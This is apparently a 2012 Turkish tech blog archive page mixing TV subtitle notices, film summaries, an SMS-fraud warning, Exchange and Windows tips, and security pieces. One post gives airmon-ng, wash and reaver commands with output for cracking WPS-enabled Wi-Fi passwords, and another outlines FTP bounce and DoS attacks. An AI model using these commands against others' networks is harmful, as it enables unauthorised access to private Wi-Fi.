Spartacus : Vengeance (İntikam) 3. Bölüm Yayınlandı

16 Şubat 2012 Perşembe

3. bölüm 10.02.2012 Cuma günü yayınlandı.

Spartacus.S02E03.720p.HDTV.x264-IMMERSE uyumlu alt yazı senkronlanması tamamlandı, izlenebilir durumda.


Share/Bookmark

WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak

Bana göre Wi-Fi ağlar’da henüz istenilen düzeyde security uygulanamıyor. Bunun nedenleri;

1- Kullanıcı bilgi yetersizliği

2- Halen wireless şifrelerimiz WPA2 değil

3- MAC filtreleme kullanmıyoruz.

4- WPS’ in açıkları.

WPS (Wi-Fi Protected Setup) teknolojisi, kablosuz ağın güvenlik ayarlarını kolayca ayarlamak için kullanılan esnek bir teknolojidir.Kablosuz ağ cihazını yapılandırırken, üzerinde bulunan PIN numarası ile cihazın yapılandırılmasını sağlar.

Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebilir. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.

Örnek Airmon saldırısı:

#airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

# wash -i mon0 –C [Burada MAC adreslerini veremeyeceğim :) ]

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID

# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv –no-nack -d 5 -f –x298 (WPA PSK: KISMINA DİKKAT)

[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ’47128211′
[+] WPA PSK: ‘ŞİFRE’
[+] AP SSID: ‘ERCUMENT’

[+] Nothing done, nothing to save.

Takribi WPS airmon şifre kırma saldırısı kimi duruma göre 1 saati geçebilir ama tüm wireless şifrelerini kırabilecek düzeyde olduğunu söyleyebilirim.


Share/Bookmark

Film Tavsiyesi: Tower Heist-Kule Soygunu (2011)

Filmin Konusu:

Josh Covacs (Ben Stiller), New York'ta yaşayan ve şehrin en güvenli ve en lüks konutlarından birinin yöneticisidir. 10 yılı aşkındır sürdürdüğü bu görevde uçan kuş bile ondan sorulur. Fakat bu binanın en üst katında büyük bir vurguncu olan borsacı Arthur Shaw (Alan Alda) yaşamaktadır. Yatırımcılarından 2 milyar dolar çaldıktan sonra yakıyı ele veren Shaw bu süper lüks kulede ev hapsindedir ve Arthur'un en büyük mağdurları da parasını ona kaptıran kule çalışanlarıdır!

Josh ve ekibi Arthur'dan hem paralarını hem intikamlarını almak için bir plan yaparlar. Büyük bir dolandırıcı olan Slide (Eddie Murphy)’ı ekibe dahil edip, Arthur’un dairesinde saklandığına emin oldukları 'şeyi' çalma hedefindedirler. Soyguncular acemidir, fakat yıllardır korudukları binayı herkesten daha iyi tanımışlardır...

Film Hakkında Bilgi: http://www.imdb.com/title/tt0471042/


Share/Bookmark

155 Polis Numarası ile Gelen Sahte SMS’lere Dikkat

Kısa mesaj (SMS) ile yapılan dolandırıcılıklar sürekli artarken, özellikle polise ait 155 numarası kullanılarak atılan sahte mesajların önlenmesi için BTK (Bilgi Teknolojileri Kurumu)  tarafından çalışma başlatıldı. Yurtdışı kaynaklı bir yazılımla, polis adına ya da tuzak kurulmak istenen kişinin numarası kullanılarak SMS'ler atıldığı saptandı. BTK’da Turkcell, Avea, Vodafone gibi firmaların gönderilen mesajın gerçekten o kullanıcıya ait olup olmadığını tespit etmesini ve bu mesajların önlenmesini istedi. Farklı numaralardan ve ya isimler kullanılarak smscity.com gibi sitelerden de mesaj gönderilebiliyor.

YABANCI YAZILIM KULLANILIYOR
Konuya yönelik bir tebliğ taslağı hazırlayan BTK, SMS hizmetlerinde gönderici kimliğine ilişkin bilgilerin yanlış, yanıltıcı, boş veya hatalı olarak gönderildiği belirtilerek, bu durumun da kamuoyunda sıkıntılara ve şikayetlere neden olduğunu kaydetti.

Dolandırıcıların yurt dışı kaynaklı bir yazılımla attığı kısa mesajda gönderici bilgisi olarak 155 ya da 112 acil numarası yer alıyor. Bu mesajı alan kişiden acil bir durum için verilen hesap numarasına havale yapması isteniyor.

NUMARALARA KONTROL GELİYOR
YENİ tebliğ taslağına göre işletmeciler, gönderen bilgisinin normal bir cep numarası olup olmadığını kontrol edecek ve standartlara uymayan bir SMS çağrısı varsa bunu engelleyecek. Böylece, bir SMS'i gerçekte kim gönderiyor ise belli olacak. Bu şekilde vatandaşların dolandırıcılara inanarak işlem ya da havale yapması önlenecek.

ŞİRKETLERİN GÖRÜŞÜ ALINACAK
SMS gönderen bilgisinde boş ve eksik numaralar kullanılamayacak. Acil yardım çağrı hizmetlerine ya da güvenlik güçlerine tahsisli numaralar da yanıltıcı biçimde oluşturulamayacak. Yurt içinden veya yurtdışından başlayan kısa mesaj gönderimlerinde, yanlış ve yanıltıcı biçimde oluşturulmuş kısa mesajlar, alıcı işletmeci tarafından engellenecek. Ayrıca yurtdışından gönderilen kısa mesajlarda, Türkiye'deki bir abonenin uluslararası roaming (dolaşım) yapmadığı durumda, o kişiye ait numara gönderen kısmında yer almayacak. Gönderen numarasının rakam sayısı, normal cep numaralarına uygun olacak. Gönderen numarasında numara dışındaki ünlem, artı işareti türü işaretler kullanılamayacak. Söz konusu tebliğ, işletmecilerin görüşünün ardından yayınlanacak.

Kaynak: BTK (Bilgi Teknolojileri Kurumu)


Share/Bookmark

Exchange 2010 ActiveSync Mail Sorunu

Iphone üzerinden mailleriniz çalışırken, bazı kullanıcılarda çalışıp, bazılarında çalışmadığını görürseniz. Exchange tarafında tüm ayarlarınız doğru olduğuna emin olduktan sonra çalışmayan Kullanıcılar için yapmanız gereken işlemler aşağıdaki gibidir.

1- Active Directory Users and Computers’ı açın.

2- View / Advanced Features seçeneiğini tıklayın.

3- Active sync sorunu yaşayan userın özelliklerine girin.

4- Security / Advanced tabını açın. Buradan Exchange servers kısmını işaretleyip, Include inheritable permission from this object’s parent kutucuğunu işaretleyin.


Share/Bookmark

Android 4.0 Yüz Tanıma (Face Unlock ) Güvenlik Açığı

Android 4.0 – Ice Cream Sandwich ‘in dikkat çeken güvenlik önlemi olarak tanıtılan “Yüz Tanıma (Face Unlock)” ; Telefonunuzu kullanmadığınızda tuş kilidi ile aktif olan bir güvenlik sistemidir. Telefon tuş kilidi şifresi ile açılmasının dışında tercihe bağlı olarak daha önce tanılanmış kullanıcısının görüntüsü ile kilidi açılıyor. Bunu ön kamera vasıtasıyla daha önce tanımlanmış fotoğraf ile karşılaştırarak sağlıyor. Eğer görüntü fotoğraf ile uyuşmuyor ise telefon kilidi açılmıyor.

FACE UNLOCK FAILED videosunda da izleyeceğiniz gibi başka bir telefondaki fotoğrafı bile görmesi cihazın kilidinin kolayca açılmasını sağladı. Dolayısıyla sadece telefonun sahibine ait bir fotoğraf ile bile kilit devre dışı kaldığı için başarısızlık olarak adlandırılabilir. Yazılımcılar gelişme aşamasında olduğunu ve daha hasas hale getirilerek önlem alınacağını bildirmiş.


Share/Bookmark

XPM (Windows XP Mode) Bilgisayarımda Çalışır mı?

XPM, Windows 7 Professional, Ultimate ve Enterprise sistemler üzerinde çalışan sanal PC tabanlı bir ortamdır. Bu özellik, Windows XP ile tam uyumluluk sağlanması amacıyla Windows 7′ye eklenmiştir. XPM özelliğini verimli şekilde kullanmak için bazı kriterlere gerek duyuluyor.

Bunlar sırasıyla;

1-Windows 7 Professional, Enterprise veya Ultimate

2- 2GB RAM (minimum) Intel Sanallaştırma Teknolojisi (Intel VT) veya AMD Sanallaştırma Teknolojisi (AMD-V) İlk iki seçenek her kullanıcının kolaylıkla temin edebileceği ve öğrenebileceği özellikler.

3- Üçüncü seçenek kullanmış olduğunuz işlemcinin sanallaştırma (Interl VT, AMD-V) teknolojisini destekleyip/desteklemediğini göstermektedir. İşlemcinizin bu özelliğe sahip olup/olmadığını öğrenmek için aşağıdaki uygulamaları kullanabilirsiniz.

Download Intel Processor Identification Utility

Download AMD-V Technology and Microsoft Hyper-V Compatibility Check


Share/Bookmark

Office 15 Geliyor Mu ?

Microsoft ‘un tartışmasız en iyi masaüstü çözüm paketlerinden biri olan Microsoft Office, 2010 yılında pek çok diğer Microsoft ürünü gibi yenilenmişti. Office 2010 ‘un yayınlanmasının ardından Office ekibi bir sonraki sürüm üzerinde çalışmaya başlamıştı.

Geçtiğimiz hafta yayınlanan bir habere göre Office 15 ‘in Technical Preview denen kısıtlı sayıdaki kullanıcıya açtığı programı başladı. Detaylar için bu adresi ziyaret edebilirsiniz.


Share/Bookmark

Spartacus : Vengeance (İntikam) 2. Bölüm Yayınlandı...

7 Şubat 2012 Salı

2. bölüm 03.02.2012 Cuma günü yayınlandı.

Spartacus.S02E02.720p.HDTV.X264-DIMENSION alt yazı senkronlanması tamamlandı, izlenebilir durumda.


Share/Bookmark

FTP Sunucularına Yapılabilecek Saldırı Türleri

Bir FTP sunucusuna yapılan saldırının başarılı olması için ilgili sunucunun kullanıcıya sunduğu yetkilerin ve genel güvenlik ayarlarının yanlış yapılandırılmış olması gerekir. FTP sunucusuna yapılacak saldırılardan korunabilmek için sunucu ve güvenlik duvarı ayarlarının yalnızca dış bağlantılar için değil, iç sunucularla aralarındaki özel iletişim noktaları için de iyi yapılandırılması gerekmektedir.

SSL yerine RCP Kullanılması

RCP ile sağlanan iletişimde herhangi bir şifreleme yoktur ve bilgiler düz metin halinde yollanır ve alınır. FTP sunucusunda kimlik doğrulama aşamasında RCP kullanıldığı takdirde kullanıcı adı ve şifre, sunucuya düz metin halinde gider ve iletişimi dinlemekte olan saldırgan bu paketi yakaladığında bilgilere de kolaylıkla ulaşır.

Pasif ve Aktif Kullanıcı Yapılandırması

FTP sistemi temel olarak iki bağlantı noktası üzerinden çalışır. Bu kanallar “denetleme kanalı” ve “veri kanalı” olarak ikiye ayrılır.

Denetim kanalı, 21 numaralı port üzerinden çalışır. İstemciler, sunucunun bu portuna bağlanırlar ve veri iletişimini başlatırlar. Dosya aktarımı veri kanalı üzerinden yapılır. Dosya aktarımında iki çeşit bağlantı kullanılır.

Aktif Bağlantı: Aktif bağlantıda veri aktarımının hangi yolla yapılacağına istemci karar verir. İstemci, sunucuya belirli bir bağlantı noktasından veri aktarımını başlatması için istek gönderir ve sunucu aktarımı başlatır.

Pasif Bağlantı: Pasif bağlantıda veri aktarımının hangi yolla yapılacağına sunucu karar verir. İstemci, sunucudan bir dosya talep eder ve sunucu istemciye dosyayı sunucunun hangi bağlantı noktasından alabileceği bilgisini gönderir. Bu

IP/MAC Maskelemesi: IP/MAC kontrolü yapan bir sunucudan dosyayı çalmak için saldırgan, asıl istemcinin IP ve MAC adreslerini tespit edip, kendisini bu bilgilere göre maskelemesi gerekir. Bu da saldırının başarı şansını oldukça azaltmaktadır. Bahsi geçen saldırıda dosyayı talep eden bilgisayardan önce sunucuya bağlanmak gerekir. Saldırgan, IP ve MAC maskelemesini yapana kadar geçen sürede dosyayı talep eden bilgisayar sunucuya bağlanmış olacaktır.

Zaman Aşımı Süresi: IP/MAC filtrelemesi yapan bir sunucuya yapılan saldırının başarılı olması, istemcinin dosya aktarımı sırasında kısa süreli bağlantı kopuklukları yaşaması ile mümkündür.

Bu açıkların yanı sıra FTP sunucularına saldırıda en sık kullanılan yöntem sıçrama saldırısı olarak bilinen yöntemdir. Sıçrama saldırısı ile çeşitli açıklar kullanılarak çeşitli saldırılar yapılır.

Bounce Saldırısı: Bounce saldırısının en önemli özelliği, saldırganın bulunmasını zorlaştırmasıdır. Diğer saldırılar ile birlikte kullanıldığında bir saldırgan hiçbir iz bırakmadan saldırısını gerçekleştirebilir. Bu tip bir saldırıdaki mantık bir FTP sunucusunun proxy olarak kullanılmasıdır. “Bounce” yöntemi ile yapılabilecek temel saldırı tipleri şunlardır:

Bağlantı Noktası Tarama: Saldırgan herhangi bir sunucuda bağlantı noktası taraması gerçekleştirmek için bu yöntemi kullanırsa sunucu günlüklerinden saldırı ayrıntılarına bakıldığı zaman bağlantı noktası taramasını yapan bilgisayar olarak FTP sunucusu görünür ve saldırgana ulaşmak zorlaşır. Saldırı yapılacak sunucu ile proxy olarak kullanılan FTP sunucusu aynı alt ağda ise hedef sunucu, FTP sunucusundan gelen verilerde herhangi bir paket filtrelemesi yapmaz ve yollanan paketler güvenlik duvarına takılmaz.

Temel Paket Süzgeçlerinden Geçmek: Bir saldırgan bu yöntemi kullanarak anonim bir FTP sunucusunun arkasına kurulan ve güvenlik duvarı tarafından korunan bir iç sunucuya ulaşabilir. Anonim FTP sunucusuna bağlanan saldırgan, bağlantı noktası tarama yöntemi ile bu sunucuya herhangi bir bağlantı noktasından bağlı olan bir iç sunucuyu tespit eder ve tespit ettiği bağlantı noktasından arkadaki sunucuya ulaşabilir.

Hizmet Yadsıması (Denial of Service) Saldırısı: DoS saldırıları tanım itibariyle yeni bir tür güvenlik açığı değildir. DoS saldırıları temel olarak, hedef sunucunun kaynaklarını harcayarak, sunucunun hizmet vermesini engellemek amaçlı yapılır. Yani saldırıya uğramış bir FTP sunucusunun ziyaretçileri bu saldırı boyunca sunucuya bağlanamayacak veya talep ettiği dosyayı alamayacaktır.


Share/Bookmark

Film Tavsiyesi: The Three Musketeers - Üç Silahşörler (2011)

Filmin Konusu: Alexandre Dumas’ın tekrar sinemaya uyarlanan bu unutulmaz hikayesinde asabi bir genç olan D’Artagnan (Logan Lerman) ve üç haydut silahşör (Matthew Macfadyen, Luke Evans ve Ray Stevenson) kötülüklere karşı koymak için güçlerini birleştirir. Şeytani planları olan Richlieu’yu (Christoph Waltz) durdurmak için Buckingham (Orlando Bloom) ve hain Milady (Milla Jovovich) ile karşı karşıya kalacaklardır.

Film Hakkında Bilgi: http://www.imdb.com/title/tt1509767/


Share/Bookmark

Türkiye'nin Ocak Ayı İnternet Raporu

Socialbakers, 2012 yılının ilk raporunu yayınladı. Bu sefer YouTube hakkında da birtakım sonuçlar açıklayan yetkililer, Ocak 2012'nin internet eğilimi dikkat çekici.

Buna göre kullanıcıların en büyük kesimini %34 ile 18-24 yaş gurubu gençler oluşturuyor. Facebook'ta yaklaşık 31 milyon üyesi bulunan Türkiye'de en çok ziyaretçisi olan markalar sıralamasının ilk 3 ismi Avea, Turkcell ve Nike.


Share/Bookmark

Pardus ve GNU /Linux Dökümanları

Pardus kullanmak isteyenler ama KDE masaüstünü hiç kullanmamş olanlar için görsel egitim linki aşağıdadır.

http://rapidshare.com/files/46903204/pardus_goersel_e_itim_seti_tuerk_e_-_downsystem.org.rar

Ayrıca Pardus hakkında bir dokuman ;

http://www.cizgi-tagem.org/resource/vfiles/tagem/dms_file/1691/pardus%20kullanim%20kilavuzu.pdf

GNU / Linux tanımak için ;

http://www.cizgi-tagem.org/resource/vfiles/tagem/dms_file/2514/linux_egitim_101.pdf

http://www.cizgi-tagem.org/resource/vfiles/tagem/dms_file/2515/linux_egitim_102.pdf


Share/Bookmark

SQL Server 2012 Sanal Lab

SQL Server 2012 Sanal lablar ile çok hızlı bir biçimde SQL Server 2012 ile gelen yenilikleri deneme fırsatı bulacaksınız. Sanal lablar ile sizi yönlendiren kılavuz sayesinde yenilikleri 90 dakikadan daha az sürede test etmek mümkün olacak.

Sanal labları hemen denemek için tıklayın.


Share/Bookmark

Microsoft Exchange PST Capture Pst Capture Tool Yayınlandı

PST Capture aracı sayesinde network üzerindeki PST’leri arayıp bulduğunuz bu PST dosyalarını yerleşik Exchange sunucularınıza veya Exchange Online sistemine import etme şansına sahipsiniz. Bu import işlemini kullanıcı mailbox’ ına direk import edebileceğiniz gibi isterseniz arşiv posta kutusunada alabilirsiniz.

Bu aracı indirimek için aşağıdaki linki kullanabilirsiniz

http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=28767


Share/Bookmark

Tarihteki İlk Bilgisayar Şifresi

Biraz uzun ama ilginç bir yazı…

Massachusetts Teknoloji Enstitüsündeki (MIT) araştırmacıların, CTSS olarak anılan büyük zaman-paylaşma bilgisayarını kurduğu zamanlara… İşin can alıcı yanı, o günlerde bile şifreler kullanıcılarını korumayı becerememişti. Teknoloji değişti, peki ya şifreler? Sanmıyoruz…

“Şifreler sadece kafası çalışmayanlara güzel”

Wired’ın iletişime geçtiği bilgisayar tarihçilerinin çoğu, ilk şifrelerin MIT’nin CTSS’inden gelmiş olması gerektiğini söylemiş. Bilgisayar meraklıları arasında ünlü olan CTSS, bugünkü bilgisayarların ve uygulamaların çoğunun yapı taşı ve öncüsü olmuştur. Örnek vermek gerekirse, e-posta, sanal makineler, anında mesajlaşma ve dosya paylaşımı bunların başta gelenleri.

1960′lı yıllarda CTSS projesini yöneten Fernando Corbato, şifre konusunu üstlenmekten çekiniyor; “Eminim ki bu mekanizmanın ataları vardır” diyor. 1960 yılında 30 milyon dolar para harcanarak -o devirde bu paraya bir ticari jet uçağı alınabiliyordu- yapılan ve CTSS’yi alt eden IBM’in Sabre biletleme sistemiyle ilgili IBM’le iletişime geçmeye çalışmış Wired, fakat oradan da kesin bir sonuç alamamışlar.

Corbato’ya göre MIT’de bile hackerlar sınırlarını aşıp yapabilecekleri her şeyi yapıyorlardı. Şifreler sadece kafası çalışmayanlara güzel görünüyordu. “Asıl problem, çoklu kullanıcılar tarafından kullanılan çoklu terminaller kuruyorduk fakat her kullanıcının kendine özel dosya seti vardı. Her kullanıcıya kilit için bir şifre koymak çok kolay bir çözüm gibi görünüyordu” diyor Wired’a.

Kaynakları şifrelerle doldurmak

60′lara döndüğümüzde, Cornell Üniversitesi’ndeki bir bilgisayar bilimi profesörü olan Fred Schneider’e göre başka yollar da vardı. CTSS elemanları şifre yerine bilgi-temelli kimlik denetleme sistemi de kullanabilirlerdi. Bilgisayar kişiye, başkası tarafından bilinemeyecek bir şey sorabilirdi, mesela annenizin kızlık soyadı…

“Fakat bilgisayarcılığın ilk günlerinde, şifreler diğer alternatiflere nazaran daha ufak ve kolay depolanabilirdi” diyor Schneider. Bilgi-temelli bir sistem “kişi hakkında belli miktarda bir bilgi depolamalıydı ve kimse makinenin değerli kaynaklarını böyle bir kimlik tanımlama sistemiyle doldurmak istemezdi.”

İşin ironik yanı, şifrelerin öncülüğünü yapan MIT araştırmacıları güvenliği hiç önemsememişlerdi. CTSS belki de veri hırsızlığı yaşanan ilk sistemdi. 1966 yılında bir gün, yazılımda meydana gelen bir hata sonucu sistemin açılış mesajıyla beraber daha önce sisteme giriş yapmış olan tüm kullanıcıların şifreleri geldi ekrana. Fakat asıl hikaye bu da değil. Olaydan 25 yıl sonra, 60′lı yıllarda MIT’de doktora araştırmacısı olan Allan Scherr, tarihte dosyalanan ilk şifre hırsızlığını bakın nasıl anlatıyor…

Şifreleri böyle çalmışlar…

1962 ilkbaharında, Scherr CTSS kullanma saatini artırmak için bir yol arıyordu. Normalde haftada 4 saat kullanmasına izin veriliyordu fakat bu süre onun yeni bilgisayar sistemi için tasarladığı detaylı performans simülasyonunu çalıştırabilmesi için yeterli değildi. O da basitçe, sistemde saklanan bütün şifreleri yazdırdı.

“Dosyaları çevrimdışı yazdırmanın tek yolu delikli kartları kullanmaktı. Cuma gecesi geç bir saatte şifre dosyalarının yazdırılmasını komut verdim ve Cumartesi sabahı çok erken bir saatte çıktıların bulunduğu dosya dolabına gidip listeyi aldım” diyor Scherr.

Suçu etrafına dağıtmak için Scherr şifreleri diğer kullanıcılara da dağıtmış. O kullanıcılardan biri- J.C.R. Licklieder- gecikmeden bilgisayar laboratuvar şefi Robert Fano’nun hesabından giriş yapıp, arkasında “iğneleyici mesajlar” bırakmış.

Kaynak: veteknoloji.com


Share/Bookmark